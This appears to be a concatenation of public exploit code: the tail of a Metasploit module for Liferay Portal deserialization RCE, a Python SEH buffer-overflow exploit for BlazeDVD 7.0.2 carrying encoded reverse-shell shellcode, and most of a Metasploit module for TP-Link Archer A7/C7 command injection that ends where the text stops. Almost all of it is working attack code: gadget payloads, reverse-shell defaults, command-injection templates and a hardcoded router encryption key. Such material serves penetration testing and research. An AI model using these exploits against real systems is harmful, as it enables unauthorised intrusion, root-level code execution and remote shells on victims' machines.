        ['URL', 'https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271']
      ],
      'DisclosureDate' => '2019-11-25', # Vendor advisory
      'License'        => MSF_LICENSE,
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Privileged'     => false,
      'Targets'        => [
        ['Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2', {}]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_tcp'},
      'Notes'          => {
        'Stability'    => [CRASH_SAFE],
        'Reliability'  => [REPEATABLE_SESSION],
        'SideEffects'  => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    # GET / response contains a Liferay-Portal header with version information
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path)
    )

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.headers['Liferay-Portal']
      return CheckCode::Unknown(
        'Target did not respond with Liferay-Portal header.'
      )
    end

=begin
    Building the Liferay-Portal header:
      https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java
    Liferay-Portal header data:
      https://github.com/liferay/liferay-portal/blob/master/release.properties

    Example GET / response:
      HTTP/1.1 200
      [snip]
      Liferay-Portal: Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019)
      [snip]
=end
    version, build = res.headers['Liferay-Portal'].scan(
      /^Liferay.*Portal ([\d.]+.*GA\d+).*Build (\d+)/
    ).flatten

    unless version && (build = Integer(build) rescue nil)
      return CheckCode::Detected(
        'Target did not respond with Liferay version and build.'
      )
    end

    # XXX: Liferay versions older than 7.2.1 GA2 (build 7201) "may" be unpatched
    if build < 7201
      return CheckCode::Appears(
        "Liferay #{version} MAY be a vulnerable version. Please verify."
      )
    end

    CheckCode::Safe("Liferay #{version} is NOT a vulnerable version.")
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    # Start our HTTP server to provide remote classloading
    @classloader_uri = start_service

    unless @classloader_uri
      fail_with(Failure::BadConfig, 'Could not start remote classloader server')
    end

    print_good("Started remote classloader server at #{@classloader_uri}")

    # Send our remote classloader gadget to the target, triggering the vuln
    send_request_gadget(
      normalize_uri(target_uri.path, '/api/jsonws/expandocolumn/update-column'),
      # Required POST parameters for /api/jsonws/expandocolumn/update-column:
      # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
      'columnId' => rand(8..42), # Randomize for "evasion"
      'name'     => rand(8..42), # Randomize for "evasion"
      'type'     => rand(8..42)  # Randomize for "evasion"
    )
  end

  # Convenience method to send our gadget to a URI with desired POST params
  def send_request_gadget(uri, vars_post = {})
    print_status("Sending remote classloader gadget to #{full_uri(uri)}")

    vars_post['+defaultData'] =
      'com.mchange.v2.c3p0.WrapperConnectionPoolDataSource'

    vars_post['defaultData.userOverridesAsString'] =
      "HexAsciiSerializedMap:#{go_go_gadget.unpack1('H*')};"

    send_request_cgi({
      'method'    => 'POST',
      'uri'       => uri,
      'vars_post' => vars_post
    }, 0)
  end

  # Generate all marshalsec payloads for the Jackson marshaller:
  # java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
  def go_go_gadget
    # Implementation of the Jackson marshaller's C3P0WrapperConnPool gadget:
    # https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java
    gadget = Rex::Text.decode_base64(
      <<~EOF
        rO0ABXNyAD1jb20ubWNoYW5nZS52Mi5uYW1pbmcuUmVmZXJlbmNlSW5kaXJlY3RvciRSZWZl
        cmVuY2VTZXJpYWxpemVkYhmF0NEqwhMCAARMAAtjb250ZXh0TmFtZXQAE0xqYXZheC9uYW1p
        bmcvTmFtZTtMAANlbnZ0ABVMamF2YS91dGlsL0hhc2h0YWJsZTtMAARuYW1lcQB+AAFMAAly
        ZWZlcmVuY2V0ABhMamF2YXgvbmFtaW5nL1JlZmVyZW5jZTt4cHBwcHNyABZqYXZheC5uYW1p
        bmcuUmVmZXJlbmNl6MaeoqjpjQkCAARMAAVhZGRyc3QAEkxqYXZhL3V0aWwvVmVjdG9yO0wA
        DGNsYXNzRmFjdG9yeXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAFGNsYXNzRmFjdG9yeUxvY2F0
        aW9ucQB+AAdMAAljbGFzc05hbWVxAH4AB3hwc3IAEGphdmEudXRpbC5WZWN0b3LZl31bgDuv
        AQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwALZWxlbWVudERhdGF0
        ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFuZy5PYmplY3Q7
        kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQABEhBQ0t0AANUSEV0AAZQTEFORVQ=
      EOF
    )

    # Replace length-prefixed placeholder strings with our own
    gadget.sub!("\x00\x04HACK",  packed_class_name)
    gadget.sub!("\x00\x03THE",   packed_classloader_uri)
    gadget.sub("\x00\x06PLANET", packed_class_name)
  end

  # Convenience method to pack the classloader URI as a length-prefixed string
  def packed_classloader_uri
    "#{[@classloader_uri.length].pack('n')}#{@classloader_uri}"
  end

end
            
# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH)
# Date: 2020-04-15
# Exploit Author: areyou1or0 <Busra Demir>
# Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html
# Version: 7.0.2
# Tested on: Windows 7 Pro x86

#!/usr/bin/python

file = "exploit.plf"
offset = "A" * (612 - 4)        # padding up to the SEH record
nseh = "\xeb\x1e\x90\x90"       # nSEH: short jump forward over the handler address
seh = "\x34\x31\x02\x64"        # SEH handler overwrite (little-endian 0x64023134)
nops = "\x90" * 24

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.121 LPORT=8888 -f python -e x86/alpha_mixed -b '\x00\x0a\x0d\xff'
shellcode = ""
shellcode += "\x89\xe2\xda\xcc\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
shellcode += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x69\x78\x4e\x62"
shellcode += "\x53\x30\x63\x30\x45\x50\x45\x30\x6f\x79\x7a\x45\x46"
shellcode += "\x51\x79\x50\x73\x54\x4c\x4b\x76\x30\x66\x50\x6e\x6b"
shellcode += "\x66\x32\x74\x4c\x6c\x4b\x51\x42\x72\x34\x4c\x4b\x34"
shellcode += "\x32\x31\x38\x76\x6f\x6c\x77\x61\x5a\x47\x56\x66\x51"
shellcode += "\x6b\x4f\x6e\x4c\x75\x6c\x65\x31\x33\x4c\x64\x42\x64"
shellcode += "\x6c\x31\x30\x5a\x61\x38\x4f\x64\x4d\x66\x61\x7a\x67"
shellcode += "\x49\x72\x6a\x52\x71\x42\x30\x57\x6c\x4b\x53\x62\x36"
shellcode += "\x70\x6e\x6b\x30\x4a\x45\x6c\x6c\x4b\x32\x6c\x37\x61"
shellcode += "\x43\x48\x6a\x43\x31\x58\x55\x51\x6b\x61\x32\x71\x4c"
shellcode += "\x4b\x33\x69\x47\x50\x75\x51\x6a\x73\x4c\x4b\x47\x39"
shellcode += "\x72\x38\x4d\x33\x56\x5a\x30\x49\x4e\x6b\x57\x44\x6c"
shellcode += "\x4b\x43\x31\x7a\x76\x55\x61\x79\x6f\x4e\x4c\x6a\x61"
shellcode += "\x78\x4f\x54\x4d\x33\x31\x58\x47\x54\x78\x59\x70\x44"
shellcode += "\x35\x6b\x46\x75\x53\x63\x4d\x48\x78\x75\x6b\x51\x6d"
shellcode += "\x46\x44\x74\x35\x6b\x54\x72\x78\x4c\x4b\x70\x58\x45"
shellcode += "\x74\x43\x31\x79\x43\x50\x66\x4c\x4b\x74\x4c\x32\x6b"
shellcode += "\x6e\x6b\x52\x78\x47\x6c\x46\x61\x69\x43\x6c\x4b\x47"
shellcode += "\x74\x6c\x4b\x37\x71\x4a\x70\x6d\x59\x30\x44\x46\x44"
shellcode += "\x44\x64\x33\x6b\x71\x4b\x65\x31\x43\x69\x71\x4a\x52"
shellcode += "\x71\x79\x6f\x69\x70\x51\x4f\x51\x4f\x51\x4a\x4c\x4b"
shellcode += "\x57\x62\x58\x6b\x4e\x6d\x63\x6d\x35\x38\x55\x63\x64"
shellcode += "\x72\x43\x30\x65\x50\x75\x38\x64\x37\x43\x43\x44\x72"
shellcode += "\x43\x6f\x42\x74\x52\x48\x50\x4c\x71\x67\x67\x56\x44"
shellcode += "\x47\x59\x6f\x69\x45\x68\x38\x7a\x30\x37\x71\x63\x30"
shellcode += "\x63\x30\x46\x49\x6f\x34\x71\x44\x42\x70\x32\x48\x56"
shellcode += "\x49\x6d\x50\x42\x4b\x57\x70\x69\x6f\x49\x45\x56\x30"
shellcode += "\x50\x50\x36\x30\x30\x50\x33\x70\x66\x30\x67\x30\x76"
shellcode += "\x30\x32\x48\x4a\x4a\x54\x4f\x39\x4f\x4d\x30\x39\x6f"
shellcode += "\x49\x45\x6e\x77\x42\x4a\x63\x35\x30\x68\x69\x50\x6e"
shellcode += "\x48\x46\x68\x61\x69\x62\x48\x34\x42\x63\x30\x65\x72"
shellcode += "\x6f\x48\x4f\x79\x4a\x46\x62\x4a\x46\x70\x52\x76\x52"
shellcode += "\x77\x65\x38\x4d\x49\x4d\x75\x71\x64\x70\x61\x4b\x4f"
shellcode += "\x58\x55\x4c\x45\x4f\x30\x34\x34\x54\x4c\x6b\x4f\x70"
shellcode += "\x4e\x34\x48\x63\x45\x5a\x4c\x42\x48\x6a\x50\x68\x35"
shellcode += "\x4c\x62\x32\x76\x39\x6f\x5a\x75\x63\x58\x61\x73\x32"
shellcode += "\x4d\x63\x54\x57\x70\x4f\x79\x38\x63\x52\x77\x73\x67"
shellcode += "\x62\x77\x30\x31\x7a\x56\x63\x5a\x67\x62\x71\x49\x33"
shellcode += "\x66\x79\x72\x59\x6d\x35\x36\x58\x47\x30\x44\x67\x54"
shellcode += "\x37\x4c\x75\x51\x46\x61\x6c\x4d\x37\x34\x64\x64\x66"
shellcode += "\x70\x7a\x66\x75\x50\x52\x64\x32\x74\x76\x30\x56\x36"
shellcode += "\x63\x66\x46\x36\x73\x76\x71\x46\x70\x4e\x30\x56\x76"
shellcode += "\x36\x51\x43\x51\x46\x50\x68\x71\x69\x48\x4c\x57\x4f"
shellcode += "\x6e\x66\x69\x6f\x6a\x75\x4b\x39\x79\x70\x42\x6e\x33"
shellcode += "\x66\x47\x36\x79\x6f\x36\x50\x53\x58\x76\x68\x4c\x47"
shellcode += "\x57\x6d\x31\x70\x59\x6f\x6a\x75\x4f\x4b\x6c\x30\x58"
shellcode += "\x35\x79\x32\x72\x76\x53\x58\x4f\x56\x6d\x45\x6f\x4d"
shellcode += "\x6d\x4d\x79\x6f\x4a\x75\x55\x6c\x34\x46\x31\x6c\x56"
shellcode += "\x6a\x4b\x30\x59\x6b\x6d\x30\x31\x65\x66\x65\x6d\x6b"
shellcode += "\x33\x77\x35\x43\x53\x42\x72\x4f\x50\x6a\x37\x70\x61"
shellcode += "\x43\x49\x6f\x68\x55\x41\x41"



buffer = offset + nseh + seh + nops + shellcode

f = open(file,'w')
f.write(buffer)
f.close()
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'openssl'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => 'TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution',
        'Description'    => %q{
        This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on
        the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726.
        The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does
        not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command
        as root, including downloading and executing a binary from another host.
        This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +
        Radek Domanski).
        },
        'License'        => MSF_LICENSE,
        'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>',             # Vulnerability discovery and Metasploit module
          'Radek Domanski <radek.domanski[at]gmail.com> @RabbitPro'     # Vulnerability discovery and Metasploit module
        ],
        'References'     =>
          [
            [ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'],
            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md'],
            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md'],
            [ 'CVE', '2020-10882'],
            [ 'CVE', '2020-10883'],
            [ 'CVE', '2020-10884'],
            [ 'ZDI', '20-334'],
            [ 'ZDI', '20-335'],
            [ 'ZDI', '20-336' ]
          ],
        'Privileged'     => true,
        'Platform' => 'linux',
        'Arch'     => ARCH_MIPSBE,
        'Payload'        => {},
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'DefaultOptions' =>
          {
            'PAYLOAD'   => 'linux/mipsbe/shell_reverse_tcp',
            'WfsDelay'  => 15,
          },
        'Targets'        =>
          [
            [ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)',{} ]
          ],
        'DisclosureDate' => "Mar 25 2020",
        'DefaultTarget'   => 0,
      )
    )
    register_options(
      [
        Opt::RPORT(20002)
      ])

    register_advanced_options(
      [
        OptInt.new('MAX_WAIT', [true, 'Number of seconds to wait for payload download', 15])
      ])
  end

  def check
    begin
      res = send_request_cgi({
        'uri'     => '/webpages/app.1564127413977.manifest',
        'method'  => 'GET',
        'rport'   => 80
      })

      if res && res.code == 200
        return Exploit::CheckCode::Vulnerable
      end
    rescue ::Rex::ConnectionError
      # a connection failure is not a verdict; fall through to CheckCode::Unknown
      nil
    end
    return Exploit::CheckCode::Unknown
  end

  def calc_checksum(packet)
    # reference table used to calculate the packet checksum
    # used by tdpd_pkt_calc_checksum (0x4037f0)
    # located at offset 0x0416e90 in the binary
    reference_tbl = [0x00, 0x00, 0x00, 0x00, 0x77, 0x07, 0x30, 0x96, 0xee,
    0x0e, 0x61, 0x2c, 0x99, 0x09, 0x51, 0xba, 0x07, 0x6d, 0xc4, 0x19, 0x70, 0x6a, 0xf4,
    0x8f, 0xe9, 0x63, 0xa5, 0x35, 0x9e, 0x64, 0x95, 0xa3, 0x0e, 0xdb, 0x88, 0x32, 0x79,
    0xdc, 0xb8, 0xa4, 0xe0, 0xd5, 0xe9, 0x1e, 0x97, 0xd2, 0xd9, 0x88, 0x09, 0xb6, 0x4c,
    0x2b, 0x7e, 0xb1, 0x7c, 0xbd, 0xe7, 0xb8, 0x2d, 0x07, 0x90, 0xbf, 0x1d, 0x91, 0x1d,
    0xb7, 0x10, 0x64, 0x6a, 0xb0, 0x20, 0xf2, 0xf3, 0xb9, 0x71, 0x48, 0x84, 0xbe, 0x41,
    0xde, 0x1a, 0xda, 0xd4, 0x7d, 0x6d, 0xdd, 0xe4, 0xeb, 0xf4, 0xd4, 0xb5, 0x51, 0x83,
    0xd3, 0x85, 0xc7, 0x13, 0x6c, 0x98, 0x56, 0x64, 0x6b, 0xa8, 0xc0, 0xfd, 0x62, 0xf9,
    0x7a, 0x8a, 0x65, 0xc9, 0xec, 0x14, 0x01, 0x5c, 0x4f, 0x63, 0x06, 0x6c, 0xd9, 0xfa,
    0x0f, 0x3d, 0x63, 0x8d, 0x08, 0x0d, 0xf5, 0x3b, 0x6e, 0x20, 0xc8, 0x4c, 0x69, 0x10,
    0x5e, 0xd5, 0x60, 0x41, 0xe4, 0xa2, 0x67, 0x71, 0x72, 0x3c, 0x03, 0xe4, 0xd1, 0x4b,
    0x04, 0xd4, 0x47, 0xd2, 0x0d, 0x85, 0xfd, 0xa5, 0x0a, 0xb5, 0x6b, 0x35, 0xb5, 0xa8,
    0xfa, 0x42, 0xb2, 0x98, 0x6c, 0xdb, 0xbb, 0xc9, 0xd6, 0xac, 0xbc, 0xf9, 0x40, 0x32,
    0xd8, 0x6c, 0xe3, 0x45, 0xdf, 0x5c, 0x75, 0xdc, 0xd6, 0x0d, 0xcf, 0xab, 0xd1, 0x3d,
    0x59, 0x26, 0xd9, 0x30, 0xac, 0x51, 0xde, 0x00, 0x3a, 0xc8, 0xd7, 0x51, 0x80, 0xbf,
    0xd0, 0x61, 0x16, 0x21, 0xb4, 0xf4, 0xb5, 0x56, 0xb3, 0xc4, 0x23, 0xcf, 0xba, 0x95,
    0x99, 0xb8, 0xbd, 0xa5, 0x0f, 0x28, 0x02, 0xb8, 0x9e, 0x5f, 0x05, 0x88, 0x08, 0xc6,
    0x0c, 0xd9, 0xb2, 0xb1, 0x0b, 0xe9, 0x24, 0x2f, 0x6f, 0x7c, 0x87, 0x58, 0x68, 0x4c,
    0x11, 0xc1, 0x61, 0x1d, 0xab, 0xb6, 0x66, 0x2d, 0x3d, 0x76, 0xdc, 0x41, 0x90, 0x01,
    0xdb, 0x71, 0x06, 0x98, 0xd2, 0x20, 0xbc, 0xef, 0xd5, 0x10, 0x2a, 0x71, 0xb1, 0x85,
    0x89, 0x06, 0xb6, 0xb5, 0x1f, 0x9f, 0xbf, 0xe4, 0xa5, 0xe8, 0xb8, 0xd4, 0x33, 0x78,
    0x07, 0xc9, 0xa2, 0x0f, 0x00, 0xf9, 0x34, 0x96, 0x09, 0xa8, 0x8e, 0xe1, 0x0e, 0x98,
    0x18, 0x7f, 0x6a, 0x0d, 0xbb, 0x08, 0x6d, 0x3d, 0x2d, 0x91, 0x64, 0x6c, 0x97, 0xe6,
    0x63, 0x5c, 0x01, 0x6b, 0x6b, 0x51, 0xf4, 0x1c, 0x6c, 0x61, 0x62, 0x85, 0x65, 0x30,
    0xd8, 0xf2, 0x62, 0x00, 0x4e, 0x6c, 0x06, 0x95, 0xed, 0x1b, 0x01, 0xa5, 0x7b, 0x82,
    0x08, 0xf4, 0xc1, 0xf5, 0x0f, 0xc4, 0x57, 0x65, 0xb0, 0xd9, 0xc6, 0x12, 0xb7, 0xe9,
    0x50, 0x8b, 0xbe, 0xb8, 0xea, 0xfc, 0xb9, 0x88, 0x7c, 0x62, 0xdd, 0x1d, 0xdf, 0x15,
    0xda, 0x2d, 0x49, 0x8c, 0xd3, 0x7c, 0xf3, 0xfb, 0xd4, 0x4c, 0x65, 0x4d, 0xb2, 0x61,
    0x58, 0x3a, 0xb5, 0x51, 0xce, 0xa3, 0xbc, 0x00, 0x74, 0xd4, 0xbb, 0x30, 0xe2, 0x4a,
    0xdf, 0xa5, 0x41, 0x3d, 0xd8, 0x95, 0xd7, 0xa4, 0xd1, 0xc4, 0x6d, 0xd3, 0xd6, 0xf4,
    0xfb, 0x43, 0x69, 0xe9, 0x6a, 0x34, 0x6e, 0xd9, 0xfc, 0xad, 0x67, 0x88, 0x46, 0xda,
    0x60, 0xb8, 0xd0, 0x44, 0x04, 0x2d, 0x73, 0x33, 0x03, 0x1d, 0xe5, 0xaa, 0x0a, 0x4c,
    0x5f, 0xdd, 0x0d, 0x7c, 0xc9, 0x50, 0x05, 0x71, 0x3c, 0x27, 0x02, 0x41, 0xaa, 0xbe,
    0x0b, 0x10, 0x10, 0xc9, 0x0c, 0x20, 0x86, 0x57, 0x68, 0xb5, 0x25, 0x20, 0x6f, 0x85,
    0xb3, 0xb9, 0x66, 0xd4, 0x09, 0xce, 0x61, 0xe4, 0x9f, 0x5e, 0xde, 0xf9, 0x0e, 0x29,
    0xd9, 0xc9, 0x98, 0xb0, 0xd0, 0x98, 0x22, 0xc7, 0xd7, 0xa8, 0xb4, 0x59, 0xb3, 0x3d,
    0x17, 0x2e, 0xb4, 0x0d, 0x81, 0xb7, 0xbd, 0x5c, 0x3b, 0xc0, 0xba, 0x6c, 0xad, 0xed,
    0xb8, 0x83, 0x20, 0x9a, 0xbf, 0xb3, 0xb6, 0x03, 0xb6, 0xe2, 0x0c, 0x74, 0xb1, 0xd2,
    0x9a, 0xea, 0xd5, 0x47, 0x39, 0x9d, 0xd2, 0x77, 0xaf, 0x04, 0xdb, 0x26, 0x15, 0x73,
    0xdc, 0x16, 0x83, 0xe3, 0x63, 0x0b, 0x12, 0x94, 0x64, 0x3b, 0x84, 0x0d, 0x6d, 0x6a,
    0x3e, 0x7a, 0x6a, 0x5a, 0xa8, 0xe4, 0x0e, 0xcf, 0x0b, 0x93, 0x09, 0xff, 0x9d, 0x0a,
    0x00, 0xae, 0x27, 0x7d, 0x07, 0x9e, 0xb1, 0xf0, 0x0f, 0x93, 0x44, 0x87, 0x08, 0xa3,
    0xd2, 0x1e, 0x01, 0xf2, 0x68, 0x69, 0x06, 0xc2, 0xfe, 0xf7, 0x62, 0x57, 0x5d, 0x80,
    0x65, 0x67, 0xcb, 0x19, 0x6c, 0x36, 0x71, 0x6e, 0x6b, 0x06, 0xe7, 0xfe, 0xd4, 0x1b,
    0x76, 0x89, 0xd3, 0x2b, 0xe0, 0x10, 0xda, 0x7a, 0x5a, 0x67, 0xdd, 0x4a, 0xcc, 0xf9,
    0xb9, 0xdf, 0x6f, 0x8e, 0xbe, 0xef, 0xf9, 0x17, 0xb7, 0xbe, 0x43, 0x60, 0xb0, 0x8e,
    0xd5, 0xd6, 0xd6, 0xa3, 0xe8, 0xa1, 0xd1, 0x93, 0x7e, 0x38, 0xd8, 0xc2, 0xc4, 0x4f,
    0xdf, 0xf2, 0x52, 0xd1, 0xbb, 0x67, 0xf1, 0xa6, 0xbc, 0x57, 0x67, 0x3f, 0xb5, 0x06,
    0xdd, 0x48, 0xb2, 0x36, 0x4b, 0xd8, 0x0d, 0x2b, 0xda, 0xaf, 0x0a, 0x1b, 0x4c, 0x36,
    0x03, 0x4a, 0xf6, 0x41, 0x04, 0x7a, 0x60, 0xdf, 0x60, 0xef, 0xc3, 0xa8, 0x67, 0xdf,
    0x55, 0x31, 0x6e, 0x8e, 0xef, 0x46, 0x69, 0xbe, 0x79, 0xcb, 0x61, 0xb3, 0x8c, 0xbc,
    0x66, 0x83, 0x1a, 0x25, 0x6f, 0xd2, 0xa0, 0x52, 0x68, 0xe2, 0x36, 0xcc, 0x0c, 0x77,
    0x95, 0xbb, 0x0b, 0x47, 0x03, 0x22, 0x02, 0x16, 0xb9, 0x55, 0x05, 0x26, 0x2f, 0xc5,
    0xba, 0x3b, 0xbe, 0xb2, 0xbd, 0x0b, 0x28, 0x2b, 0xb4, 0x5a, 0x92, 0x5c, 0xb3, 0x6a,
    0x04, 0xc2, 0xd7, 0xff, 0xa7, 0xb5, 0xd0, 0xcf, 0x31, 0x2c, 0xd9, 0x9e, 0x8b, 0x5b,
    0xde, 0xae, 0x1d, 0x9b, 0x64, 0xc2, 0xb0, 0xec, 0x63, 0xf2, 0x26, 0x75, 0x6a, 0xa3,
    0x9c, 0x02, 0x6d, 0x93, 0x0a, 0x9c, 0x09, 0x06, 0xa9, 0xeb, 0x0e, 0x36, 0x3f, 0x72,
    0x07, 0x67, 0x85, 0x05, 0x00, 0x57, 0x13, 0x95, 0xbf, 0x4a, 0x82, 0xe2, 0xb8, 0x7a,
    0x14, 0x7b, 0xb1, 0x2b, 0xae, 0x0c, 0xb6, 0x1b, 0x38, 0x92, 0xd2, 0x8e, 0x9b, 0xe5,
    0xd5, 0xbe, 0x0d, 0x7c, 0xdc, 0xef, 0xb7, 0x0b, 0xdb, 0xdf, 0x21, 0x86, 0xd3, 0xd2,
    0xd4, 0xf1, 0xd4, 0xe2, 0x42, 0x68, 0xdd, 0xb3, 0xf8, 0x1f, 0xda, 0x83, 0x6e, 0x81,
    0xbe, 0x16, 0xcd, 0xf6, 0xb9, 0x26, 0x5b, 0x6f, 0xb0, 0x77, 0xe1, 0x18, 0xb7, 0x47,
    0x77, 0x88, 0x08, 0x5a, 0xe6, 0xff, 0x0f, 0x6a, 0x70, 0x66, 0x06, 0x3b, 0xca, 0x11,
    0x01, 0x0b, 0x5c, 0x8f, 0x65, 0x9e, 0xff, 0xf8, 0x62, 0xae, 0x69, 0x61, 0x6b, 0xff,
    0xd3, 0x16, 0x6c, 0xcf, 0x45, 0xa0, 0x0a, 0xe2, 0x78, 0xd7, 0x0d, 0xd2, 0xee, 0x4e,
    0x04, 0x83, 0x54, 0x39, 0x03, 0xb3, 0xc2, 0xa7, 0x67, 0x26, 0x61, 0xd0, 0x60, 0x16,
    0xf7, 0x49, 0x69, 0x47, 0x4d, 0x3e, 0x6e, 0x77, 0xdb, 0xae, 0xd1, 0x6a, 0x4a, 0xd9,
    0xd6, 0x5a, 0xdc, 0x40, 0xdf, 0x0b, 0x66, 0x37, 0xd8, 0x3b, 0xf0, 0xa9, 0xbc, 0xae,
    0x53, 0xde, 0xbb, 0x9e, 0xc5, 0x47, 0xb2, 0xcf, 0x7f, 0x30, 0xb5, 0xff, 0xe9, 0xbd,
    0xbd, 0xf2, 0x1c, 0xca, 0xba, 0xc2, 0x8a, 0x53, 0xb3, 0x93, 0x30, 0x24, 0xb4, 0xa3,
    0xa6, 0xba, 0xd0, 0x36, 0x05, 0xcd, 0xd7, 0x06, 0x93, 0x54, 0xde, 0x57, 0x29, 0x23,
    0xd9, 0x67, 0xbf, 0xb3, 0x66, 0x7a, 0x2e, 0xc4, 0x61, 0x4a, 0xb8, 0x5d, 0x68, 0x1b,
    0x02, 0x2a, 0x6f, 0x2b, 0x94, 0xb4, 0x0b, 0xbe, 0x37, 0xc3, 0x0c, 0x8e, 0xa1, 0x5a,
    0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d]

    res = 0xffffffff

    # main checksum calculation
    packet.each_entry { |c|
      index = ((c ^ res) & 0xff) * 4
      # .reverse is needed as the target is big endian
      ref = (reference_tbl[index..index+3].reverse.pack('C*').unpack('L').first)
      res = ref ^ (res >> 8)
    }

    checksum = ~res
    checksum_s = [(checksum)].pack('I>').force_encoding("ascii")

    # convert back to string
    packet = packet.pack('C*').force_encoding('ascii')

    # and replace the checksum
    packet[12] = checksum_s[0]
    packet[13] = checksum_s[1]
    packet[14] = checksum_s[2]
    packet[15] = checksum_s[3]

    packet
  end

  def aes_encrypt(plaintext)
    # Function encrypts perfectly 16 bytes aligned payload

    if (plaintext.length % 16 != 0)
      return
    end

    cipher = OpenSSL::Cipher.new 'AES-128-CBC'
    # in the original C code the key and IV are 256 bits long... but they still use AES-128
    iv = "1234567890abcdef"
    key = "TPONEMESH_Kf!xn?"
    encrypted = ''
    cipher.encrypt
    cipher.iv = iv
    cipher.key = key

    # Take each 16 bytes block and encrypt it
    plaintext.scan(/.{1,16}/) { |block|
      encrypted += cipher.update(block)
    }

    encrypted
  end

  def create_injection(c)
    # Template for the command injection
    # The injection happens at "slave_mac" (read advisory for details)
    # The payload has to be padded to a multiple of 16 bytes (one AES block) to ensure reliability between different OpenSSL versions.

    # This will fail if we send a command with single quotes (')
    # ... but that's not a problem for this module, since we don't use them for our command.
    # It might also fail with double quotes (") since this will break the JSON...
    inject = "\';printf \'#{c}\'>>#{@cmd_file}\'"

    template = "{\"method\":\"slave_key_offer\",\"data\":{"\
    "\"group_id\":\"#{rand_text_numeric(1..3)}\","\
    "\"ip\":\"#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}\","\
    "\"slave_mac\":\"%{INJECTION}\","\
    "\"slave_private_account\":\"#{rand_text_alpha(5..13)}\","\
    "\"slave_private_password\":\"#{rand_text_alpha(5..13)}\","\
    "\"want_to_join\":false,"\
    "\"model\":\"#{rand_text_alpha(5..13)}\","\
    "\"product_type\":\"#{rand_text_alpha(5..13)}\","\
    "\"operation_mode\":\"A%{PADDING}\"}}"

    # This is required to calculate exact template length without replace flags
    template_len = template.length - '%{INJECTION}'.length - '%{PADDING}'.length
    # This has to be initialized to cover the situation when no padding is needed
    pad = ''
    padding = rand_text_alpha(16)

    template_len += inject.length

    # Calculate pad if padding is needed
    if (template_len % 16 != 0)
      pad = padding[0..15-(template_len % 16)]
    end

    # Here the final payload is created
    template % {INJECTION:"#{inject}", PADDING:"#{pad}"}
  end

  def update_len_field(packet, payload_length)
    new_packet = packet[0..3]
    new_packet += [payload_length].pack("S>")
    new_packet += packet[6..-1]
  end

  def exec_cmd_file(packet)
    # This function handles special action of exec
    # Returns new complete tpdp packet
    inject = "\';sh #{@cmd_file}\'"
    payload = create_injection(inject)

    ciphertext = aes_encrypt(payload)
    if not ciphertext
      fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
    end

    new_packet = packet[0..15]
    new_packet += ciphertext
    new_packet = update_len_field(new_packet, ciphertext.length)

    calc_checksum(new_packet.bytes)
  end

  # Handle incoming requests from the router
  def on_request_uri(cli, request)
    print_good("#{peer} - Sending executable to the router")
    print_good("#{peer} - Sit back and relax, Shelly will come visit soon!")
    send_response(cli, @payload_exe)
    @payload_sent = true
  end

